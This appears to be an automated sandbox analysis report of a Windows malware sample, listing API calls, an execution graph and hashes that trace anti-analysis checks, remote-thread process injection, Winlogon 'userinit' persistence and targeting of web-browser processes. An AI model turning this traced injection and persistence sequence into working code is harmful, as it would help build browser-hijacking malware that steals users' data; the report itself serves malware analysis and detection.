                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              Function 00401420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              Function 00401390 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:2%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:29.1%
                                                                                                                                                                                                              Signature Coverage:3.6%
                                                                                                                                                                                                              Total number of Nodes:220
                                                                                                                                                                                                              Total number of Limit Nodes:12
                                                                                                                                                                                                              execution_graph 65326 402d30 LoadLibraryA GetModuleFileNameA 65398 403a20 RegOpenKeyExA 65326->65398 65329 402d64 ExitProcess 65330 402d6c 65412 4021d0 CreateFileA 65330->65412 65335 402da1 65423 402360 CreateFileA 65335->65423 65336 402d89 GetTickCount PostMessageA 65336->65335 65345 402dc1 65488 401ea0 40 API calls 65345->65488 65346 402de3 IsUserAnAdmin GetModuleHandleA 65347 402e1c 65346->65347 65348 402dfd GetProcAddress 65346->65348 65351 402e22 65347->65351 65352 402e6e 65347->65352 65348->65347 65350 402e0f GetCurrentProcess 65348->65350 65350->65347 65356 402e26 StrStrIA 65351->65356 65357 402e3c 65351->65357 65354 402e76 StrStrIA 65352->65354 65355 402efd 65352->65355 65353 402dc6 65358 402dd2 65353->65358 65359 402dca ExitProcess 65353->65359 65360 402ea1 65354->65360 65361 402e8c 65354->65361 65364 402930 9 API calls 65355->65364 65356->65357 65362 402e5f 65356->65362 65449 402930 RegCreateKeyExA 65357->65449 65489 403560 70 API calls 65358->65489 65493 402a70 106 API calls 65360->65493 65366 402930 9 API calls 65361->65366 65490 402a70 106 API calls 65362->65490 65369 402f08 GlobalFindAtomA 65364->65369 65372 402e97 65366->65372 65375 402f58 ExitProcess 65369->65375 65376 402f18 GlobalAddAtomA IsUserAnAdmin 65369->65376 65371 402dd7 65371->65346 65378 402ddb ExitProcess 65371->65378 65492 4028d0 43 API calls 65372->65492 65373 402ea6 GlobalFindAtomA 65380 402ef6 65373->65380 65381 402eb6 GlobalAddAtomA IsUserAnAdmin 65373->65381 65383 402f39 IsUserAnAdmin 65376->65383 65384 402f29 65376->65384 65377 402e64 65491 4012b0 9 API calls 65377->65491 65495 4012b0 9 API calls 65380->65495 65388 402ed7 IsUserAnAdmin 65381->65388 65389 402ec7 65381->65389 65390 402f44 65383->65390 65384->65383 65387 402e69 65387->65375 65392 402ee2 65388->65392 65389->65388 65496 4015a0 7 API calls 65390->65496 65494 4015a0 7 API calls 65392->65494 65394 402f4f 65394->65375 65396 401670 32 API calls 65394->65396 65395 402eed 65395->65380 65397 401670 32 API calls 65395->65397 65396->65375 65397->65380 65399 403a6a RegQueryValueExA 65398->65399 65400 403acd GetUserNameA CharUpperA strstr 65398->65400 65403 403a9b RegCloseKey 65399->65403 65404 403a8f RegCloseKey 65399->65404 65401 402d60 65400->65401 65402 403b0b strstr 65400->65402 65401->65329 65401->65330 65402->65401 65406 403b24 strstr 65402->65406 65403->65400 65405 403aae 65403->65405 65404->65400 65405->65400 65405->65401 65406->65401 65407 403b3d GetSystemWindowsDirectoryA GetVolumeInformationA 65406->65407 65407->65401 65408 403b7d 65407->65408 65408->65401 65409 403b99 GetModuleFileNameA StrStrIA 65408->65409 65409->65401 65410 403bc5 StrStrIA 65409->65410 65410->65401 65411 403bd7 StrStrIA 65410->65411 65411->65401 65413 402350 65412->65413 65414 402320 DeviceIoControl CloseHandle 65412->65414 65415 4020e0 memset SHGetFolderPathA 65413->65415 65414->65413 65416 4021a7 65415->65416 65417 40213e PathAppendA SetCurrentDirectoryA 65415->65417 65419 4021b2 FindWindowA 65416->65419 65420 4021ab FreeLibrary 65416->65420 65417->65416 65418 402161 LoadLibraryA 65417->65418 65418->65416 65421 402175 GetProcAddress 65418->65421 65419->65335 65419->65336 65420->65419 65421->65416 65422 402185 65421->65422 65422->65416 65424 402403 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 65423->65424 65425 402444 65423->65425 65424->65425 65426 402450 SHGetFolderPathA 65425->65426 65427 402535 65426->65427 65428 402477 65426->65428 65430 402540 SHGetFolderPathA 65427->65430 65428->65428 65429 4024ec MoveFileA 65428->65429 65429->65427 65431 40266f 65430->65431 65432 40256b CreateFileA 65430->65432 65435 402680 CoInitializeEx 65431->65435 65432->65431 65434 4025d1 11 API calls 65432->65434 65434->65431 65436 4026ae 65435->65436 65437 4026bf GetModuleFileNameW SysAllocString 65435->65437 65436->65437 65439 4028c4 IsUserAnAdmin 65436->65439 65438 4026ed SysAllocString 65437->65438 65444 402866 65437->65444 65440 402853 SysFreeString 65438->65440 65441 4026fe CoCreateInstance 65438->65441 65439->65345 65439->65346 65442 402863 SysFreeString 65440->65442 65440->65444 65443 402827 65441->65443 65446 402725 65441->65446 65442->65444 65443->65440 65444->65439 65445 4028be CoUninitialize 65444->65445 65445->65439 65446->65440 65446->65443 65447 4027b3 CoCreateInstance 65446->65447 65448 4027d5 65447->65448 65448->65443 65450 402975 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 65449->65450 65451 4029fd RegCreateKeyExA 65449->65451 65453 4029e0 65450->65453 65452 402a44 65451->65452 65451->65453 65454 402a4c RegFlushKey RegCloseKey 65452->65454 65455 402a5d GetCurrentProcessId 65452->65455 65453->65453 65456 402a3e RegSetValueExA 65453->65456 65454->65455 65457 401670 65455->65457 65456->65452 65458 4018d3 Sleep 65457->65458 65459 401686 65457->65459 65458->65375 65461 4016a5 65459->65461 65462 40169b Sleep 65459->65462 65497 401cf0 memset CreateToolhelp32Snapshot 65459->65497 65463 401cf0 11 API calls 65461->65463 65462->65459 65462->65461 65464 4016ac 65463->65464 65464->65458 65465 4016b4 OpenProcess 65464->65465 65465->65458 65466 4016cf GetModuleHandleA 65465->65466 65467 401706 65466->65467 65468 4016eb GetProcAddress 65466->65468 65470 40170c GetModuleHandleA 65467->65470 65471 40173f VirtualAllocEx 65467->65471 65468->65467 65469 4016f9 GetCurrentProcess 65468->65469 65469->65467 65472 401722 GetProcAddress 65470->65472 65473 40172e 65470->65473 65474 4018b0 GetHandleInformation 65471->65474 65475 401782 WriteProcessMemory 65471->65475 65472->65473 65473->65471 65473->65474 65474->65458 65476 4018c6 65474->65476 65477 4017ae 65475->65477 65478 40181f WriteProcessMemory FlushInstructionCache CreateRemoteThread 65475->65478 65476->65458 65479 4018cc CloseHandle 65476->65479 65480 4017b1 VirtualAlloc 65477->65480 65486 401819 65477->65486 65481 401862 GetHandleInformation 65478->65481 65482 40188e RtlCreateUserThread 65478->65482 65479->65458 65480->65477 65483 4017c9 memcpy WriteProcessMemory VirtualFree 65480->65483 65484 401885 65481->65484 65485 401878 65481->65485 65482->65474 65483->65477 65484->65474 65485->65484 65487 40187e CloseHandle 65485->65487 65486->65478 65487->65484 65488->65353 65489->65371 65490->65377 65491->65387 65492->65387 65493->65373 65494->65395 65495->65387 65496->65394 65498 401d30 GetLastError 65497->65498 65499 401d88 Module32First 65497->65499 65500 401deb 65498->65500 65501 401d3f SwitchToThread CreateToolhelp32Snapshot 65498->65501 65502 401da4 65499->65502 65503 401d55 65499->65503 65500->65459 65501->65500 65501->65503 65504 401db0 StrStrIA 65502->65504 65505 401d63 GetHandleInformation 65503->65505 65506 401d7f 65503->65506 65507 401dc2 StrStrIA 65504->65507 65508 401dce Module32Next 65504->65508 65505->65506 65509 401d72 65505->65509 65506->65459 65507->65503 65507->65508 65508->65503 65508->65504 65509->65506 65510 401d78 FindCloseChangeNotification 65509->65510 65510->65506 65511 2c979e0 NtQuerySystemInformation 65512 2c97a0f GetCurrentProcessId 65511->65512 65519 2c97ae9 65511->65519 65520 2cb4880 OpenProcess 65512->65520 65515 2c97a1e GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 65516 2c97a62 65515->65516 65517 2c97a48 lstrcmpiA 65515->65517 65518 2c97a80 memset _snprintf OpenMutexA 65516->65518 65516->65519 65517->65516 65517->65519 65518->65516 65521 2c97a1a 65520->65521 65522 2cb48a5 OpenProcessToken 65520->65522 65521->65515 65521->65516 65523 2cb48ba GetTokenInformation 65522->65523 65524 2cb4952 GetHandleInformation 65522->65524 65526 2cb48d4 CharUpperA 65523->65526 65532 2cb4902 65523->65532 65524->65521 65525 2cb4968 65524->65525 65525->65521 65527 2cb496e CloseHandle 65525->65527 65528 2cb48f0 65526->65528 65527->65521 65530 2cb4904 CharUpperA 65528->65530 65528->65532 65529 2cb4936 GetHandleInformation 65529->65524 65531 2cb4945 65529->65531 65530->65532 65531->65524 65533 2cb494b FindCloseChangeNotification 65531->65533 65532->65524 65532->65529 65533->65524 65534 29b1360 65576 29b11d0 65534->65576 65536 29b136f GetPEB 65537 29b1090 GetPEB 65536->65537 65538 29b1394 65537->65538 65539 29b1000 GetPEB 65538->65539 65540 29b13a0 65539->65540 65541 29b1090 GetPEB 65540->65541 65542 29b13a6 65541->65542 65543 29b1619 65542->65543 65544 29b13bc GetPEB 65542->65544 65545 29b1000 GetPEB 65543->65545 65546 29b1090 GetPEB 65544->65546 65547 29b1625 65545->65547 65550 29b13d8 65546->65550 65548 29b1090 GetPEB 65547->65548 65549 29b162b 65548->65549 65550->65543 65551 29b1000 GetPEB 65550->65551 65552 29b141b 65551->65552 65553 29b1090 GetPEB 65552->65553 65554 29b1421 65553->65554 65555 29b1000 GetPEB 65554->65555 65556 29b1441 65555->65556 65557 29b1090 GetPEB 65556->65557 65558 29b1447 VirtualAlloc 65557->65558 65558->65543 65574 29b1460 65558->65574 65559 29b158c 65560 29b1000 GetPEB 65559->65560 65562 29b15bd 65560->65562 65561 29b1090 GetPEB 65561->65574 65563 29b1090 GetPEB 65562->65563 65564 29b15c3 65563->65564 65565 29b12c0 GetPEB 65564->65565 65566 29b15de 65565->65566 65566->65543 65569 29b1000 GetPEB 65566->65569 65567 29b1090 GetPEB 65568 29b150f LoadLibraryExA 65567->65568 65568->65574 65571 29b1608 65569->65571 65570 29b1000 GetPEB 65570->65574 65572 29b1090 GetPEB 65571->65572 65573 29b160e 65572->65573 65575 2ca77c0 2147 API calls 65573->65575 65574->65559 65574->65561 65574->65567 65574->65570 65575->65543 65578 29b11d5 65576->65578

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 02CA6CA0 Relevance: 298.5, APIs: 135, Strings: 35, Instructions: 960threadmemorysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C93300: IsUserAnAdmin.SHELL32 ref: 02C93325
                                                                                                                                                                                                                • Part of subcall function 02C93300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C93344
                                                                                                                                                                                                                • Part of subcall function 02C93300: PathAddBackslashA.SHLWAPI(?), ref: 02C93351
                                                                                                                                                                                                                • Part of subcall function 02C93300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C9336E
                                                                                                                                                                                                                • Part of subcall function 02C93300: _snprintf.MSVCRT ref: 02C93389
                                                                                                                                                                                                                • Part of subcall function 02C93300: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C933A7
                                                                                                                                                                                                                • Part of subcall function 02C93300: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C933FC
                                                                                                                                                                                                                • Part of subcall function 02C93300: RegCloseKey.ADVAPI32(00000000), ref: 02C9340A
                                                                                                                                                                                                                • Part of subcall function 02CB5A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02CB5A7F
                                                                                                                                                                                                                • Part of subcall function 02CB5A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02CB5AB8
                                                                                                                                                                                                                • Part of subcall function 02CB5A50: _snprintf.MSVCRT ref: 02CB5B23
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02CA6CC0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02CA6CCB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02CA6CDF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02CA6CFB
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 02CA6D05
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 02CA6D3D
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB68), ref: 02CA6D65
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02CA6D86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CA6DA4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02CA6DC5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02CA6DDF
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02CA6DE9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA3530,00000000,00000000,00000000), ref: 02CA6E38
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6E4C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA6E5D
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA7DD0,00000000,00000000,00000000), ref: 02CA6E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA6EB1
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00018080,00000000,00000000,00000000), ref: 02CA6EC6
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,5DD2BD1Da), ref: 02CA6ED6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CA6EF6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02CA6F17
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(5DD2BD1Da,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02CA6F34
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02CA6F3E
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB80), ref: 02CA6F49
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA79D0,00000000,00000000,00000000), ref: 02CA6F5B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6F6B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA6F7C
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: memset.MSVCRT ref: 02C96E00
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02C96E1C
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02C96E78
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,74DF0F10,?,00000000,00000000), ref: 02C96EA0
                                                                                                                                                                                                                • Part of subcall function 02C96DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02C96EB8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA6970,00000000,00000000,00000000), ref: 02CA6F91
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6FA1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA6FB2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA54B0,00000000,00000000,00000000), ref: 02CA6FDC
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA6FF0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7001
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA7010
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA7013
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA7020
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA7023
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02CA7047
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02CA7059
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02CA7065
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA7074
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02CA7090
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02CA70B7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\java.exe), ref: 02CA70CD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02CA70E3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02CA70F9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02CA710F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02CA7125
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02CA713B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02CA7151
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02CA7167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02CA717D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02CA7193
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02CA71A9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\frd.exe), ref: 02CA71BF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02CA71D5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02CA71EB
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAB8F0,00000000,00000000,00000000), ref: 02CA7219
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7233
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7240
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAEF80,00000000,00000000,00000000), ref: 02CA7255
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7269
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7276
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB0560,00000000,00000000,00000000), ref: 02CA728B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA729F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA72AC
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB0E20,00000000,00000000,00000000), ref: 02CA72C1
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA72D5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA72E2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAF6A0,00000000,00000000,00000000), ref: 02CA72F7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA730B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7318
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CACB80,00000000,00000000,00000000), ref: 02CA732D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7341
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA734E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CACC20,00000000,00000000,00000000), ref: 02CA7363
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7377
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7384
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB1590,00000000,00000000,00000000), ref: 02CA7399
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA73AD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA73BA
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB24D0,00000000,00000000,00000000), ref: 02CA73CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA73E3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA73F0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB31C0,00000000,00000000,00000000), ref: 02CA7405
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7419
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7426
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB32B0,00000000,00000000,00000000), ref: 02CA743B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA744F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA745C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAFE80,00000000,00000000,00000000), ref: 02CA7471
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7485
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7492
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB3480,00000000,00000000,00000000), ref: 02CA74A7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA74BB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA74C8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB43F0,00000000,00000000,00000000), ref: 02CA74DD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA74F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA74FE
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB47D0,00000000,00000000,00000000), ref: 02CA7513
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7527
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7534
                                                                                                                                                                                                                • Part of subcall function 02CA5720: memset.MSVCRT ref: 02CA5741
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF550,75B07390,74DF0A60), ref: 02CA5757
                                                                                                                                                                                                                • Part of subcall function 02CA5720: AddVectoredExceptionHandler.KERNEL32(00000001,02C93A20), ref: 02CA5764
                                                                                                                                                                                                                • Part of subcall function 02CA5720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02CA577F
                                                                                                                                                                                                                • Part of subcall function 02CA5720: CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02CA5799
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetHandleInformation.KERNEL32(00000000,?), ref: 02CA57B1
                                                                                                                                                                                                                • Part of subcall function 02CA5720: CloseHandle.KERNEL32(00000000), ref: 02CA57C2
                                                                                                                                                                                                                • Part of subcall function 02CA5720: InitializeCriticalSection.KERNEL32(02CDFB50), ref: 02CA57D3
